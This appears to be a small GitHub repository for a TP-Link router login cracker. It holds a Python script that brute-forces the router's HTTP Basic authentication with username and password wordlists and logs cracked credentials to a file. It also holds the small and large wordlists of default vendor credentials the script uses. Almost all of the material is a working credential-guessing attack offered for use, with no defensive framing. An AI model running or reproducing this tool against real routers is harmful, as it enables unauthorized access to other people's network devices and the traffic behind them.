├── .gitignore
├── README.md
├── app.py
├── big_pass.txt
├── big_user.txt
├── small_pass.txt
└── small_user.txt


/.gitignore:
--------------------------------------------------------------------------------
1 | __pycache__/
2 | .Python
3 | .python-version
4 | /build
5 | /dist
6 | /target
7 | /.vscode
8 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # tp-link-router-cracker
2 | A simple dictionary attack to crack the username and password of Tp-Link Router Page
3 | 


--------------------------------------------------------------------------------
/app.py:
--------------------------------------------------------------------------------
  1 | import requests, base64
  2 | 
  3 | stop_line = 'MenuRpm.htm'
  4 | 
  5 | def get_cookie(user, password):
  6 |     # Tp-Link router use this format for sending Authorization data
  7 |     Authorization = 'Basic ' + base64.b64encode(f'{user}:{password}'.encode()).decode()
  8 |     return dict(Authorization=Authorization)
  9 |     
 10 | def back():
 11 |     while True:
 12 |         r = input('\n[??] - Back to menu(y/n): ')
 13 |         if r in ['y', 'Y']:
 14 |             menu()
 15 |         elif r in ['n', 'N']:
 16 |             exit(0)
 17 |         else:
 18 |             print('[!] - Please provide y or n')
 19 | 
 20 | def get_splited_line(pth):
 21 |     return open(pth, 'r').read().splitlines()
 22 | 
 23 | def attack(user_list, pass_list):
 24 |     while True:
 25 |         print('\nChoose ip -->\n  1 -- http://192.168.0.1/\n  2 -- http://192.168.0.1/userRpm/LoginRpm.htm/\n  3 -- Custom')
 26 |         ii = input('--> ')
 27 |         if ii == '1':
 28 |             ip = 'http://192.168.0.1/userRpm/LoginRpm.htm/'
 29 |         elif ii == '2':
 30 |             ip = 'http://192.168.0.1/'
 31 |         elif ii == '3':
 32 |             ip = 'http://' + input('[?] - IP - http://')
 33 |         if ii in ['1','2','3']:
 34 |             break
 35 | 
 36 |     print(f'[+] - Target ip - {ip}')
 37 |     while True:
 38 |         ans = input('[?] - Start (y/n) : ')
 39 |         if ans == 'y':
 40 |             break
 41 |         elif ans == 'n':
 42 |             back()
 43 | 
 44 |     print(f'[+] - Starting ')
 45 |     stop = False
 46 |     for user in user_list:
 47 |         if stop:
 48 |             break
 49 |         for password in pass_list:
 50 |             if user.strip() != '' and password.strip() != '':
 51 |                 print(f'\n[+] - Executing attack - [+]\n[+] - User: '+user+'  &  Password: '+password)
 52 |                 try:
 53 |                     r = requests.get(ip, cookies=get_cookie(user, password), params={'Save': 'Save'})
 54 |                 except Exception as e:
 55 |                     print('\n[!] - GOT ERROR -->\n', e, '\n\n[!] - Got an error. Please check your network or program')
 56 |                     stop = True
 57 |                     break
 58 |                 resp = r.status_code
 59 |                 if stop_line != '' and stop_line in r.text:
 60 |                     print(f'\n[!!] - OwO! CRACKED - {resp}\n[!!] - User: '+user+ '\n[!!] - Password: '+password)
 61 |                     response = open('result.txt','a')
 62 |                     response.write('\n'+ip+', '+user+', '+password)
 63 |                     response.close()
 64 |                     print("[!] - Result saved to 'result.txt'")
 65 |                     ans = input('\n[?] - Wanna print the content? ')
 66 |                     if ans == 'y':
 67 |                         print('\n\n', r.text, '\n\n')
 68 |                     stop = True
 69 |                     break
 70 |                 else:
 71 |                     print(f'[+] - Failed - Status [{resp}]')
 72 | 
 73 |     if not stop:
 74 |         print('\n[!] - Failed to crack')
 75 |     back()
 76 | 
 77 | def menu():
 78 |     print( '\n  Router Login Page Cracker')
 79 |     print( '       Made for TL-WR840N')
 80 |     print( '        Dictionary Attack')
 81 |     print( '         By @codernayeem')
 82 |     print( '\n   --> MENU <--')
 83 |     print( '[1] - Small Attack')
 84 |     print( '[2] - Big Attack')
 85 |     print( '[3] - Exit')
 86 |     r = input('\nSelect a option[1-3]: ')
 87 |     if r == '1':
 88 |         try:
 89 |             attack(get_splited_line('small_user.txt'), get_splited_line('small_pass.txt'))
 90 |         except FileNotFoundError:
 91 |             print('[+] - Wordlist not found. Please make sure you have "small_pass.txt" and "small_user.txt" in the same directory')
 92 |     elif r == '2':
 93 |         try:
 94 |             attack(get_splited_line('big_user.txt'), get_splited_line('big_pass.txt'))
 95 |         except FileNotFoundError:
 96 |             print('[+] - Wordlist not found. Please make sure you have "big_pass.txt" and "big_user.txt" in the same directory')
 97 |     elif r == '3':
 98 |         exit()
 99 |     else:
100 |         print('[+] - Invalid choice.')
101 |         menu()
102 | 
103 | if __name__ == "__main__":
104 |     menu()
105 | 


--------------------------------------------------------------------------------
/big_pass.txt:
--------------------------------------------------------------------------------
  1 | admin
  2 | toor
  3 | TOOR
  4 | ADMIN
  5 | ROOT
  6 | Root
  7 | Toor
  8 | 0P3N
  9 | 10023
 10 | 1064
 11 | 1111
 12 | 123
 13 | 1234
 14 | 12345
 15 | 123456
 16 | 1234admin
 17 | 1502
 18 | 166816
 19 | 21241036
 20 | 2222
 21 | 22222
 22 | 240653C9467E45
 23 | 266344
 24 | 31994
 25 | 3477
 26 | 3ascotel
 27 | 3ep5w2u
 28 | 3ware
 29 | 456
 30 | 4getme2
 31 | 4tas
 32 | 5678
 33 | 56789
 34 | 5777364
 35 | 8111
 36 | 8429
 37 | 9999
 38 | abc123
 39 | acc
 40 | access
 41 | adfexc
 42 | Admin
 43 | admin_1
 44 | admin123
 45 | administrator
 46 | ADMINISTRATOR
 47 | adminttd
 48 | admn
 49 | adslolitec
 50 | adslroot
 51 | adtran
 52 | ADTRAN
 53 | AitbISP4eCiG
 54 | and 2000 Series
 55 | anicust
 56 | ANS#150
 57 | any@
 58 | ANYCOM
 59 | apc
 60 | articon
 61 | asante
 62 | Asante
 63 | ascend
 64 | Ascend
 65 | asd
 66 | at4400
 67 | atc123
 68 | atlantis
 69 | attack
 70 | backdoor
 71 | barricade
 72 | bciimpw
 73 | bcimpw
 74 | bcmspw
 75 | bcnaspw
 76 | bcpb+serial#
 77 | bintec
 78 | blender
 79 | bluepw
 80 | BRIDGE
 81 | browsepw
 82 | cacadmin
 83 | calvin
 84 | CAROLIAN
 85 | cascade
 86 | CCC
 87 | ccrusr
 88 | cellit
 89 | cgadmin
 90 | changeme
 91 | changeme2
 92 | changeme(exclamation)
 93 | $chwarzepumpe
 94 | cisco
 95 | _Cisco
 96 | Cisco
 97 | citel
 98 | client
 99 | cmaker
100 | cms500
101 | CNAS
102 | COGNOS
103 | Col2ogro2
104 | comcomcom
105 | connect
106 | CONV
107 | corecess
108 | craft
109 | craftpw
110 | crftpw
111 | custpw
112 | dadmin01
113 | danger
114 | davox
115 | default
116 | device
117 | dhs3mt
118 | dhs3pms
119 | diamond
120 | DISC
121 | D-Link
122 | draadloos
123 | @dsl_xilno
124 | e250changeme
125 | e500changeme
126 | engineer
127 | enquirypw
128 | enter
129 | epicrouter
130 | Exabyte
131 | expert03
132 | extendnet
133 | field
134 | FIELD.SUPPORT
135 | Fireport
136 | fivranne
137 | friend
138 | ganteng
139 | Geardog
140 | gen1
141 | gen2
142 | ggdaseuaimhrke
143 | GlobalAdmin
144 | guest
145 | h179350
146 | hagpolm1
147 | hawk201
148 | hello
149 | help
150 | help1954
151 | Helpdesk
152 | highspeed
153 | HP
154 | hp.com
155 | HPDESK
156 | HPOFFICE
157 | HPOFFICE DATA
158 | HPONLY
159 | HPP187
160 | HPP187 SYS
161 | HPP189
162 | HPP196
163 | HPWORD PUB
164 | hs7mwxkk
165 | hsadb
166 | HTTP
167 | iDirect
168 | ILMI
169 | images
170 | imss7.0
171 | inads
172 | indspw
173 | initpw
174 | installer
175 | intel
176 | Intel
177 | intermec
178 | INTX3
179 | ironport
180 | isee
181 | isp
182 | ITF3000
183 | jannie
184 | JDE
185 | kermit
186 | kilo1987
187 | l2
188 | l3
189 | laflaf
190 | lantronix
191 | letacla
192 | letmein
193 | leviton
194 | linga
195 | llatsni
196 | locatepw
197 | looker
198 | LOTUS
199 | lp
200 | lucenttech1
201 | lucenttech2
202 | m1122
203 | MAIL
204 | maint
205 | maintpw
206 | !manage
207 | manager
208 | Manager
209 | MANAGER
210 | MANAGER.SYS
211 | master
212 | Master
213 | masterkey
214 | Mau'dib
215 | mediator
216 | medion
217 | MGR
218 | MGR.SYS
219 | michelangelo
220 | microbusiness
221 | MiniAP
222 | mlusr
223 | monitor
224 | motorola
225 | MPE
226 | MServer
227 | mtch
228 | mtcl
229 | mu
230 | Multi
231 | my_DEMARC
232 | n/a
233 | naadmin
234 | NAU
235 | netadmin
236 | NETBASE
237 | NetCache
238 | NetICs
239 | netman
240 | netopia
241 | netscreen
242 | NetSurvibox
243 | NetVCR
244 | NETWORK
245 | NICONEX
246 | nimdaten
247 | nmspw
248 | nokai
249 | nokia
250 | (none)
251 | none
252 | noway
253 | ntacdmax
254 | NULL
255 | OCS
256 | often blank
257 | OkiLAN
258 | op
259 | operator
260 | OP.OPERATOR
261 | otbu+1
262 | P@55w0rd!
263 | pass
264 | PASS
265 | PASSW0RD
266 | password
267 | Password
268 | PASSWORD
269 | passwort
270 | patrol
271 | PBX
272 | pbxk1064
273 | pento
274 | permit
275 | pfsense
276 | pilou
277 | piranha
278 | PlsChgMe
279 | Posterie
280 | private
281 | PRODDTA
282 | Protector
283 | public
284 | public/private/secret
285 | pwp
286 | q
287 | R1QTPS
288 | radius
289 | radware
290 | raidzone
291 | rcustpw
292 | recovery
293 | REGO
294 | REMOTE
295 | replicator
296 | RIP000
297 | RJE
298 | rmnetlm
299 | ro
300 | ROBELLE
301 | root
302 | ROOT500
303 | router
304 | r@p8p0r+
305 | RSX
306 | rw
307 | rwa
308 | rwmaint
309 | scmchangeme
310 | scout
311 | secret
312 | $secure$
313 | secure
314 | security
315 | SECURITY
316 | serial#
317 | SERVICE
318 | SESAME
319 | setup
320 | Sharp
321 | sitecom
322 | SKY_FOX
323 | smallbusiness
324 | smcadmin
325 | SMDR
326 | smile
327 | snmp-Trap
328 | specialist
329 | speedxess
330 | SpIp
331 | SSA
332 | star
333 | stratauser
334 | super
335 | Super
336 | SUPER
337 | superuser
338 | supervisor
339 | support
340 | SUPPORT
341 | supportpw
342 | surt
343 | switch
344 | symbol
345 | Symbol
346 | synnet
347 | sys
348 | SYS
349 | sysadm
350 | sysadmin
351 | sysAdmin
352 | sys/change_on_install
353 | system
354 | SYSTEM
355 | talent
356 | TANDBERG
357 | TCH
358 | tech
359 | telco
360 | telecom
361 | Telecom
362 | TELESUP
363 | tellabs#1
364 | TENmanUFactOryPOWER
365 | the 6 last digit of the MAC adress
366 | the same all over
367 | tiaranet
368 | tiger123
369 | timely
370 | tini
371 | tivonpw
372 | TJM
373 | tlah
374 | trancell
375 | tslinux
376 | tuxalize
377 | UI-PSWD-01
378 | UI-PSWD-02
379 | uplink
380 | user
381 | User
382 | VESOFT
383 | visual
384 | volition
385 | w0rkplac3rul3s
386 | w2402
387 | webadmin
388 | winterm
389 | Wireless
390 | wlsedb
391 | wlsepassword
392 | WORD
393 | wrgg15_di524
394 | wyse
395 | x40rocks
396 | x-admin
397 | xbox
398 | xd
399 | xdfk9874t3
400 | XLSERVER
401 | xxyyzz
402 | zoomadsl
403 | 


--------------------------------------------------------------------------------
/big_user.txt:
--------------------------------------------------------------------------------
  1 | admin
  2 | toor
  3 | TOOR
  4 | ADMIN
  5 | ROOT
  6 | Root
  7 | Toor
  8 | 11111
  9 | 1234
 10 | 1500
 11 | 1502
 12 | 1.79
 13 | 192.168.1.1 60020
 14 | 266344
 15 | 31994
 16 | 3comcso
 17 | aaa
 18 | acc
 19 | adfexc
 20 | adm
 21 | Admin
 22 | admin2
 23 | administrator
 24 | Administrator
 25 | ADMINISTRATOR
 26 | adminstat
 27 | adminstrator
 28 | adminttd
 29 | adminuser
 30 | adminview
 31 | ADMN
 32 | ADSL
 33 | ADVMAIL
 34 | Alphanetworks
 35 | ami
 36 | anonymous
 37 | Anonymous
 38 | Any
 39 | apc
 40 | at4400
 41 | bbsd-client
 42 | bciim
 43 | bcim
 44 | bcms
 45 | bcnas
 46 | blue
 47 | browse
 48 | cablecom
 49 | cac_admin
 50 | ccrusr
 51 | cellit
 52 | cgadmin
 53 | cisco
 54 | Cisco
 55 | CISCO15
 56 | citel
 57 | client
 58 | cmaker
 59 | comcast
 60 | corecess
 61 | craft
 62 | CSG
 63 | cusadmin
 64 | cust
 65 | customer
 66 | dadmin
 67 | davox
 68 | d.e.b.u.g
 69 | debug
 70 | deskalt
 71 | deskman
 72 | desknorm
 73 | deskres
 74 | device
 75 | dhs3mt
 76 | dhs3pms
 77 | diag
 78 | disttech
 79 | D-Link
 80 | draytek
 81 | DTA
 82 | e250
 83 | e500
 84 | echo
 85 | enable
 86 | eng
 87 | engmode
 88 | enquiry
 89 | Factory
 90 | field
 91 | FIELD
 92 | ftp_admi
 93 | ftp_inst
 94 | ftp_nmc
 95 | ftp_oper
 96 | Gearguy
 97 | GEN1
 98 | GEN2
 99 | GlobalAdmin
100 | guest
101 | Guest
102 | halt
103 | HELLO
104 | helpdesk
105 | hsa
106 | hscroot
107 | HTTP
108 | hydrasna
109 | iclock
110 | images
111 | inads
112 | init
113 | install
114 | installer
115 | intel
116 | intermec
117 | IntraStack
118 | IntraSwitch
119 | isp
120 | jagadmin
121 | JDE
122 | kermit
123 | l2
124 | l3
125 | locate
126 | login
127 | lp
128 | LUCENT01
129 | LUCENT02
130 | m1122
131 | mac
132 | MAIL
133 | maint
134 | maintainer
135 | manage
136 | manager
137 | Manager
138 | MANAGER
139 | manuf
140 | MD110
141 | MDaemon
142 | mediator
143 | MGR
144 | MICRO
145 | mlusr
146 | monitor
147 | mso
148 | mtch
149 | mtcl
150 | naadmin
151 | NAU
152 | netadmin
153 | netman
154 | NETOP
155 | netopia
156 | netrangr
157 | netscreen
158 | NETWORK
159 | NICONEX
160 | nms
161 | none
162 | op
163 | operator
164 | OPERATOR
165 | patrol
166 | PBX
167 | PCUSER
168 | PFCUser
169 | piranha
170 | pmd
171 | poll
172 | Polycom
173 | PRODDTA
174 | PSEAdmin
175 | public
176 | radware
177 | rapport
178 | rcust
179 | readonly
180 | readwrite
181 | recovery
182 | replicator
183 | RMUser1
184 | ro
185 | !root
186 | root
187 | Root
188 | RSBCMON
189 | rw
190 | rwa
191 | sa
192 | scmadmin
193 | scout
194 | security
195 | serial#
196 | service
197 | Service
198 | setup
199 | smc
200 | spcl
201 | SPOOLMAN
202 | SSA
203 | storwatch
204 | stratacom
205 | su
206 | super
207 | superadmin
208 | superman
209 | super.super
210 | superuser
211 | SUPERUSER
212 | supervisor
213 | support
214 | sys
215 | sysadm
216 | SYSADM
217 | sysadmin
218 | SYSDBA
219 | system
220 | system/manager
221 | target
222 | teacher
223 | tech
224 | technician
225 | telco
226 | telecom
227 | tellabs
228 | temp1
229 | tiara
230 | tiger
231 | TMAR#HWMT8007079
232 | topicalt
233 | topicnorm
234 | topicres
235 | Type User: FORCE
236 | user
237 | User
238 | USERID
239 | vcr
240 | VNC
241 | volition
242 | vt100
243 | webadmin
244 | websecadm
245 | wlse
246 | wlseuser
247 | WP
248 | wradmin
249 | write
250 | xbox
251 | xd
252 | 


--------------------------------------------------------------------------------
/small_pass.txt:
--------------------------------------------------------------------------------
 1 | admin
 2 | Admin
 3 | ADMIN
 4 | root
 5 | Root
 6 | ROOT
 7 | toor
 8 | Toor
 9 | TOOR
10 | user
11 | User
12 | USER
13 | username
14 | Username
15 | UserName
16 | USERNAME
17 | administrator
18 | Administrator
19 | ADMINISTRATOR
20 | password
21 | Password
22 | PASSWORD
23 | pass
24 | Pass
25 | PASS
26 | 12345
27 | 54321
28 | 1234
29 | 4321
30 | 0123
31 | 3214
32 | 12345678
33 | 87654321
34 | 123456789
35 | 987654321
36 | 1234567890
37 | 0987654321
38 | 0123456789
39 | 9876543210
40 | 9876
41 | 6789
42 | 0987
43 | 7890
44 | 13579
45 | 97531


--------------------------------------------------------------------------------
/small_user.txt:
--------------------------------------------------------------------------------
 1 | admin
 2 | Admin
 3 | ADMIN
 4 | root
 5 | Root
 6 | ROOT
 7 | toor
 8 | Toor
 9 | TOOR
10 | user
11 | User
12 | USER
13 | username
14 | Username
15 | UserName
16 | USERNAME
17 | administrator
18 | Administrator
19 | ADMINISTRATOR
20 | password
21 | Password
22 | PASSWORD
23 | pass
24 | Pass
25 | PASS
26 | 12345
27 | 54321
28 | 1234
29 | 4321
30 | 0123
31 | 3214
32 | 12345678
33 | 87654321
34 | 123456789
35 | 987654321
36 | 1234567890
37 | 0987654321
38 | 0123456789
39 | 9876543210
40 | 9876
41 | 6789
42 | 0987
43 | 7890
44 | 13579
45 | 97531


--------------------------------------------------------------------------------